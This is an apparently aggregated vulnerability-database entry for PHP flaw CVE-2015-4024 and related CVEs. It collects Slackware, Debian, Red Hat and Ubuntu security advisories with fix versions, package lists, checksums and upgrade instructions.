MD5 signatures: +-------------+
Slackware 14.0 package: 5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz
Slackware 14.1 package: 52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 82b75af6253121cab6cc84dd714f554c php-5.4.41-x86_64-1_slack14.1.txz
Slackware -current package: e1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz
Slackware x86_64 -current package: ae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg php-5.4.41-i486-1_slack14.1.txz
Then, restart Apache httpd:
/etc/rc.d/rc.httpd stop
/etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
CVE-2015-4024
Denial of service when processing multipart/form-data requests.
CVE-2015-4022
Integer overflow in the ftp_genlist() function may result in
denial of service or potentially the execution of arbitrary code.
For the oldstable distribution (wheezy), these problems have been fixed in version 5.4.41-0+deb7u1.
For the stable distribution (jessie), these problems have been fixed in version 5.6.9+dfsg-0+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 5.6.9+dfsg-1.
For the unstable distribution (sid), these problems have been fixed in version 5.6.9+dfsg-1.
We recommend that you upgrade your php5 packages
Show details on source website{
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"data": "Algorithmic complexity vulnerability in the multipart_buffer_headers function in main/rfc1867.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote attackers to cause a denial of service (CPU consumption) via crafted form data that triggers an improper order-of-growth outcome. PHP is prone to a remote denial-of-service vulnerability. \nSuccessful exploitation of the issue will cause excessive CPU resource consumption, resulting in a denial-of-service condition. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. An algorithmic complexity vulnerability exists in the \u0027multipart_buffer_headers\u0027 function in PHP\u0027s main/rfc1867.c file. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. 6) - i386, x86_64\n\n3. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: php security and bug fix update\nAdvisory ID: RHSA-2015:1135-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html\nIssue date: 2015-06-23\nCVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 \n CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 \n CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 \n CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 \n CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 \n CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 \n CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 \n CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 \n CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 \n CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 \n CVE-2015-4605 \n=====================================================================\n\n1. Summary:\n\nUpdated php packages that fix multiple security issues and several bugs\nare now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. \n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP\u0027s Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application. \n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP\u0027s FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP\u0027s Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP\u0027s File Information (fileinfo) extension. \nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP\u0027s enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash. \n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption. \n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize()\n1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)\n1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c\n1188599 - CVE-2014-9652 file: out of bounds read in mconvert()\n1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c\n1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone\n1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict()\n1194747 - CVE-2015-2301 php: use after free in phar_object.c\n1204868 - CVE-2015-4147 php: SoapClient\u0027s __call() type confusion through unserialize()\n1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re\n1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name\n1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4\n1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions\n1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo\n1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing\n1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode()\n1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS\n1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods\n1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+\n1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing\n1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character\n1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name\n1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata()\n1226916 - CVE-2015-4148 php: SoapClient\u0027s do_soap_call() type confusion after unserialize()\n1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions\n1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions\n1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize\n1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion\n\n6. Package List:\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nppc64:\nphp-5.4.16-36.el7_1.ppc64.rpm\nphp-cli-5.4.16-36.el7_1.ppc64.rpm\nphp-common-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-gd-5.4.16-36.el7_1.ppc64.rpm\nphp-ldap-5.4.16-36.el7_1.ppc64.rpm\nphp-mysql-5.4.16-36.el7_1.ppc64.rpm\nphp-odbc-5.4.16-36.el7_1.ppc64.rpm\nphp-pdo-5.4.16-36.el7_1.ppc64.rpm\nphp-pgsql-5.4.16-36.el7_1.ppc64.rpm\nphp-process-5.4.16-36.el7_1.ppc64.rpm\nphp-recode-5.4.16-36.el7_1.ppc64.rpm\nphp-soap-5.4.16-36.el7_1.ppc64.rpm\nphp-xml-5.4.16-36.el7_1.ppc64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-5.4.16-36.el7_1.s390x.rpm\nphp-cli-5.4.16-36.el7_1.s390x.rpm\nphp-common-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-gd-5.4.16-36.el7_1.s390x.rpm\nphp-ldap-5.4.16-36.el7_1.s390x.rpm\nphp-mysql-5.4.16-36.el7_1.s390x.rpm\nphp-odbc-5.4.16-36.el7_1.s390x.rpm\nphp-pdo-5.4.16-36.el7_1.s390x.rpm\nphp-pgsql-5.4.16-36.el7_1.s390x.rpm\nphp-process-5.4.16-36.el7_1.s390x.rpm\nphp-recode-5.4.16-36.el7_1.s390x.rpm\nphp-soap-5.4.16-36.el7_1.s390x.rpm\nphp-xml-5.4.16-36.el7_1.s390x.rpm\nphp-xmlrpc-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp-5.4.16-36.ael7b_1.src.rpm\n\nppc64le:\nphp-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-cli-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-common-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-gd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-ldap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-odbc-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pdo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-process-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-recode-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-soap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xml-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nphp-bcmath-5.4.16-36.el7_1.ppc64.rpm\nphp-dba-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-devel-5.4.16-36.el7_1.ppc64.rpm\nphp-embedded-5.4.16-36.el7_1.ppc64.rpm\nphp-enchant-5.4.16-36.el7_1.ppc64.rpm\nphp-fpm-5.4.16-36.el7_1.ppc64.rpm\nphp-intl-5.4.16-36.el7_1.ppc64.rpm\nphp-mbstring-5.4.16-36.el7_1.ppc64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.ppc64.rpm\nphp-pspell-5.4.16-36.el7_1.ppc64.rpm\nphp-snmp-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-bcmath-5.4.16-36.el7_1.s390x.rpm\nphp-dba-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-devel-5.4.16-36.el7_1.s390x.rpm\nphp-embedded-5.4.16-36.el7_1.s390x.rpm\nphp-enchant-5.4.16-36.el7_1.s390x.rpm\nphp-fpm-5.4.16-36.el7_1.s390x.rpm\nphp-intl-5.4.16-36.el7_1.s390x.rpm\nphp-mbstring-5.4.16-36.el7_1.s390x.rpm\nphp-mysqlnd-5.4.16-36.el7_1.s390x.rpm\nphp-pspell-5.4.16-36.el7_1.s390x.rpm\nphp-snmp-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64le:\nphp-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-dba-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-devel-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-embedded-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-enchant-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-fpm-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-intl-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pspell-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-snmp-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-8142\nhttps://access.redhat.com/security/cve/CVE-2014-9652\nhttps://access.redhat.com/security/cve/CVE-2014-9705\nhttps://access.redhat.com/security/cve/CVE-2014-9709\nhttps://access.redhat.com/security/cve/CVE-2015-0231\nhttps://access.redhat.com/security/cve/CVE-2015-0232\nhttps://access.redhat.com/security/cve/CVE-2015-0273\nhttps://access.redhat.com/security/cve/CVE-2015-2301\nhttps://access.redhat.com/security/cve/CVE-2015-2348\nhttps://access.redhat.com/security/cve/CVE-2015-2783\nhttps://access.redhat.com/security/cve/CVE-2015-2787\nhttps://access.redhat.com/security/cve/CVE-2015-3307\nhttps://access.redhat.com/security/cve/CVE-2015-3329\nhttps://access.redhat.com/security/cve/CVE-2015-3330\nhttps://access.redhat.com/security/cve/CVE-2015-3411\nhttps://access.redhat.com/security/cve/CVE-2015-3412\nhttps://access.redhat.com/security/cve/CVE-2015-4021\nhttps://access.redhat.com/security/cve/CVE-2015-4022\nhttps://access.redhat.com/security/cve/CVE-2015-4024\nhttps://access.redhat.com/security/cve/CVE-2015-4025\nhttps://access.redhat.com/security/cve/CVE-2015-4026\nhttps://access.redhat.com/security/cve/CVE-2015-4147\nhttps://access.redhat.com/security/cve/CVE-2015-4148\nhttps://access.redhat.com/security/cve/CVE-2015-4598\nhttps://access.redhat.com/security/cve/CVE-2015-4599\nhttps://access.redhat.com/security/cve/CVE-2015-4600\nhttps://access.redhat.com/security/cve/CVE-2015-4601\nhttps://access.redhat.com/security/cve/CVE-2015-4602\nhttps://access.redhat.com/security/cve/CVE-2015-4603\nhttps://access.redhat.com/security/cve/CVE-2015-4604\nhttps://access.redhat.com/security/cve/CVE-2015-4605\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFViR1aXlSAg2UNWIIRAuxPAJ42GLQVzvzc9kje0VjDv8NZWcPv6QCbBL+O\ndtqycPWs+07GhjmZ6NNx5Bg=\n=FREZ\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ============================================================================\nUbuntu Security Notice USN-2658-1\nJuly 06, 2015\n\nphp5 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.04\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in PHP. \n\nSoftware Description:\n- php5: HTML-embedded scripting language interpreter\n\nDetails:\n\nNeal Poole and Tomas Hoger discovered that PHP incorrectly handled NULL\nbytes in file paths. (CVE-2015-3411, CVE-2015-3412, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-4598)\n\nEmmanuel Law discovered that the PHP phar extension incorrectly handled\nfilenames starting with a NULL byte. (CVE-2015-4021)\n\nMax Spelsberg discovered that PHP incorrectly handled the LIST command\nwhen connecting to remote FTP servers. (CVE-2015-4022,\nCVE-2015-4643)\n\nShusheng Liu discovered that PHP incorrectly handled certain malformed form\ndata. (CVE-2015-4024)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\ndata types. (CVE-2015-4147)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\nthat the uri property is a string. A remote attacker could possibly use these issues to\nobtain sensitive information or cause a denial of service. This issue only affected Ubuntu\n15.04. (CVE-2015-4644)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.04:\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.2\n php5-cgi 5.6.4+dfsg-4ubuntu6.2\n php5-cli 5.6.4+dfsg-4ubuntu6.2\n php5-fpm 5.6.4+dfsg-4ubuntu6.2\n\nUbuntu 14.10:\n libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.6\n php5-cgi 5.5.12+dfsg-2ubuntu4.6\n php5-cli 5.5.12+dfsg-2ubuntu4.6\n php5-fpm 5.5.12+dfsg-2ubuntu4.6\n\nUbuntu 14.04 LTS:\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.11\n php5-cgi 5.5.9+dfsg-1ubuntu4.11\n php5-cli 5.5.9+dfsg-1ubuntu4.11\n php5-fpm 5.5.9+dfsg-1ubuntu4.11\n\nUbuntu 12.04 LTS:\n libapache2-mod-php5 5.3.10-1ubuntu3.19\n php5-cgi 5.3.10-1ubuntu3.19\n php5-cli 5.3.10-1ubuntu3.19\n php5-fpm 5.3.10-1ubuntu3.19\n\nIn general, a standard system update will make all the necessary changes. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded. \n This update fixes some bugs and security issues. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n82b75af6253121cab6cc84dd714f554c 